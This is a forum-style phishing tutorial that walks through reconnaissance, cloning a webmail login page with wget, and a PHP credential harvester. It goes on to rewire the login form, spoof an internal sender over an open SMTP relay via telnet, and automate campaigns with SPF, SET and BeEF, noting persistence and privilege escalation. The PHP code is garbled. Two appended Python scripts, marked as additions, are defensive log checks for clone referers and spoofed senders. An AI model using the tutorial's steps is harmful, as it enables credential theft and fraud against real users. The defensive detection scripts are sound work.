Phishing tutorial

Black Stone

Dec 6, 2016
Phishing is an attempt to acquire sensitive information by masquerading as a trustworthy entity in the world of electronic communication.

what types of sensitive information?

for example:

credentials such as user / pass
credit cards
identity (documents, license)
health information
Steam accounts, bitcoin wallets, etc.

3 usual types of attack

Phishing - normally with a specific purpose and to receive money

Spear phishing - specific targets or groups

whaling - specific to a single person

why phish?

why implement a phish attack if there are other types of attacks?

because it works! it attacks people, not computers (there are training and protocols, but people are lazy and continue to click links)

phishing process

1. reconnaissance (e.g. e-mail, position in the company, systems, log-in page, etc.)
- Info gathering
- For large companies, email addresses are potentially bought on the black market
- Start testing to get future attacks right
- Active and passive info gathering for vulnerabilities

tools for reconnaissance:
Maltego Radium
NetGlub
theHarvester

2. setup and deployment (organizing the systems useful to our goal)
domain registration
mass mailer
open relays for the target domain

Web server setup
website cloning
web application development

malicious attachments / malware payloads (BeEF)
browser exploits

test everything before sending, you will not have a second chance

3. collect answers / organize

test credentials
do other phish attacks from trusted accounts
connect them to a botnet / shells and go into persistence
escalate your privileges


4. draw up a report
do it for exercise and to keep everything neat


let's get to work

we identify our target and carry out all of step one

clone the website for hosting:
wget --recursive --level = 1 --convert-links --page-requisites URL.ph/mail/

start fixing the cloned site:
sudo mv URL.ph/mail / var / www / html
sudo vim /var/www/html/mail/index.html

for this attack to be functional we need to record the user and pass of the various users; we can write a short PHP script to collect all the variables (such as user / pass)
<? Php
$ User = & _POST ['_ user'];
$ Pass = & _POST ['_ pass'];

$ F = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();

header ("Location: htp: //url.ph/mail/");
die ();

$ User = & _POST ['_ user'];
$ Pass = & _POST ['_ pass'];

record username and password

$ F = fopen ("collect.txt", "a");
fwrite ($ f, "$ user: $ pass \ n");
fclose ();

We save them in collect.txt

header ("Location: htp: //url.ph/mail/");
die ();
Send them back to the original site

as the copy of the website stands, the script would not work, so we have to go in and change the form of the cloned site.
<Form> Original

<Form name = "form" action = "index.html" method = "post">

running form

<Form name = "form" action = "form.php" method = "post">

---------------------------------------------------

so once we have created the site and found a way to collect the data, we need to set up a server and finally test our attack.

so here we set the right permissions for our web page
sudo chown www-data: www-data / var / www / -R

service apache2 restart

now test the page we created; let's check

cat /var/www/mail/creds.txt

for example: lol / usr iMbid / pass

---------------------------------------------------

once we have tested this function, back to the reconnaissance stage
- mail server

- We need to understand how to send the phishing e-mail
- during a vulnerability scan we find that the mail server is an open relay, which will allow us to pose as a particular user.

then, using telnet, we build the email to our target,
in which we pose as a known, privileged user who asks another known, privileged user to test the performance of a new private section



url.com 25 telnet (port)
ehlo url.com
mail from: bjenius@URL.com
Mail to: rbourne@URL.com
subject: Webmail Site Update
We are currently testing a new performance configuration for the webmail site, please test the site change by visiting: url.com/mail (our url to craft)



attack tools - make the job easier

- Phishing Frenzy

SET: the best, complete

BeEF is normally used as part of the attack to find more information

Phishing Frenzy is similar to SET and meta brows, very nice


how do I make this work if I am lazy - simpler and AUTOMATIC

BeEF RESTful API
recon-cli command line - call bees
SET - seautomate
- Python, Perl, & Bash

recommended in 2015

SpeedPhish Framework - SPF
- goes through all the starting points of the work
- Automates the tasks useful for making a phishing attack
- written in Python
- complete or partial automation
- can be configured with external tools if available

current capabilities

- Collects email addresses from the internet
- Sets up & hosts the website
- Sends phishing e-mail to our target
- Creates reports

Let's look at this program in more depth:
install it
first cd / SPF-master
take a look at Requirements.txt

cd / spf
./spf.py -h (options)

important to take a look

the suggestion is to launch it first with --test and check that everything works perfectly

let's take a look at the config:

we can set the server that sends the email


if we try to run

./spf.py --test -d example.com

It will tell us that it is using the settings in default.cfg (we can also have more .cfg files)

It tries to find email addresses linked to the website;
at the end of the process it will tell us that, for example, 41 emails related to our target were found.

after that it will start to set up the phishing web server
It will mount the website template
then the e-mail template
then begin to send email
Finally, it monitors the activity on the phishing website
We see all the activity on our template, and pressing CTRL-C will stop the web server and generate the report.
of course, if we have not collected anything we should not stop the web server.

this guide is for education and information; anyone who shares it does so in the pure spirit of education.

I'm trying to speak English; if I fail, please help me make it more precise.
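
For defenders, the redirect back to the original site described in the post is a detection point: a browser following it can carry the clone's address in the Referer header, and the wget mirroring step leaves wget's default User-Agent in the real site's access log. The following is an added example, not part of the original post; the host names, log lines and function names are constructed for illustration and assume the "combined" access-log format.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format (assumed for this example).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (documentation IP ranges, reserved names).
SAMPLE = [
    '203.0.113.7 - - [06/Dec/2016:10:00:01 +0000] "GET /mail/ HTTP/1.1" 200 5120 "-" "Wget/1.18 (linux-gnu)"',
    '198.51.100.23 - - [07/Dec/2016:09:12:44 +0000] "GET /mail/ HTTP/1.1" 200 5120 "http://webmail-example.test/" "Mozilla/5.0"',
    '198.51.100.40 - - [07/Dec/2016:09:15:02 +0000] "GET /mail/ HTTP/1.1" 200 5120 "http://webmail-example.test/mail/index.html" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Dec/2016:09:16:30 +0000] "POST /mail/index.html HTTP/1.1" 302 0 "https://webmail.example.com/mail/" "Mozilla/5.0"',
    '192.0.2.11 - - [07/Dec/2016:09:17:00 +0000] "GET /about.html HTTP/1.1" 200 900 "https://search.example.org/?q=x" "Mozilla/5.0"',
]

def login_requests(lines, login_prefix):
    """Yield regex matches for requests that hit the login path only."""
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["path"].startswith(login_prefix):
            yield m

def foreign_login_referers(lines, own_hosts, login_prefix="/mail/"):
    """Map each off-site Referer host to the client IPs it sent to the login page."""
    own = {h.lower() for h in own_hosts}
    hits = {}
    for m in login_requests(lines, login_prefix):
        if m["referer"] in ("", "-"):
            continue  # direct visits and bookmarks carry no Referer
        host = (urlsplit(m["referer"]).hostname or "").lower()
        if host and host not in own:
            hits.setdefault(host, set()).add(m["ip"])
    return {h: sorted(ips) for h, ips in hits.items()}

def mirror_clients(lines, login_prefix="/mail/"):
    """Clients that fetched the login page with wget's default User-Agent."""
    return sorted({m["ip"] for m in login_requests(lines, login_prefix)
                   if m["ua"].startswith("Wget/")})

if __name__ == "__main__":
    print(foreign_login_referers(SAMPLE, {"webmail.example.com"}))
    print(mirror_clients(SAMPLE))
```

Each client IP listed under a foreign Referer host is a user who probably submitted credentials to the clone, so those accounts are the ones to reset first.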
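
The mail step in the post depends on the server accepting a message that claims an internal sender from an outside, unauthenticated client. The check below flags exactly that in mail logs. It is an added example, not part of the original post; it assumes Postfix-style smtpd/qmgr log lines with short queue IDs, and the domain, networks and log lines are constructed.

```python
import ipaddress
import re

# Postfix-style log lines (assumed): smtpd records the client, qmgr the sender.
CLIENT_RE = re.compile(
    r'postfix/smtpd\[\d+\]: (?P<qid>[0-9A-F]+): client=\S*\[(?P<ip>[^\]]+)\](?P<rest>.*)')
FROM_RE = re.compile(
    r'postfix/qmgr\[\d+\]: (?P<qid>[0-9A-F]+): from=<(?P<sender>[^>]*)>')

# Constructed sample log (documentation IP ranges, reserved domains).
SAMPLE = [
    'Dec  6 10:01:00 mx postfix/smtpd[2201]: 3F2A1C0D: client=unknown[203.0.113.7]',
    'Dec  6 10:01:02 mx postfix/qmgr[1100]: 3F2A1C0D: from=<jdoe@example.com>, size=612, nrcpt=1 (queue active)',
    'Dec  6 10:02:00 mx postfix/smtpd[2202]: 4B7E9A12: client=ws12.example.com[10.0.4.12]',
    'Dec  6 10:02:01 mx postfix/qmgr[1100]: 4B7E9A12: from=<asmith@example.com>, size=900, nrcpt=1 (queue active)',
    'Dec  6 10:03:00 mx postfix/smtpd[2203]: 5C11D0FE: client=home.isp.test[198.51.100.9], sasl_method=PLAIN, sasl_username=asmith',
    'Dec  6 10:03:01 mx postfix/qmgr[1100]: 5C11D0FE: from=<asmith@example.com>, size=450, nrcpt=1 (queue active)',
    'Dec  6 10:04:00 mx postfix/smtpd[2204]: 6D00AA31: client=mail.partner.test[192.0.2.55]',
    'Dec  6 10:04:01 mx postfix/qmgr[1100]: 6D00AA31: from=<alice@partner.test>, size=700, nrcpt=1 (queue active)',
]

def spoofed_internal_senders(lines, own_domain, internal_nets):
    """Return (queue_id, sender, client_ip) for mail that claims an own-domain
    sender but came from an external client without SASL authentication."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    clients = {}   # queue id -> (client address, authenticated?)
    findings = []
    for line in lines:
        m = CLIENT_RE.search(line)
        if m:
            clients[m["qid"]] = (ipaddress.ip_address(m["ip"]),
                                 "sasl_username=" in m["rest"])
            continue
        m = FROM_RE.search(line)
        if not m or m["qid"] not in clients:
            continue
        ip, authenticated = clients[m["qid"]]
        sender_domain = m["sender"].rpartition("@")[2].lower()
        external = not any(ip in net for net in nets)
        if sender_domain == own_domain.lower() and external and not authenticated:
            findings.append((m["qid"], m["sender"], str(ip)))
    return findings

if __name__ == "__main__":
    print(spoofed_internal_senders(SAMPLE, "example.com", ["10.0.0.0/8"]))
```

A finding here means the server should be configured to require authentication or an internal source address for own-domain senders, and the recipients of the flagged message should be told it was not sent by the named colleague.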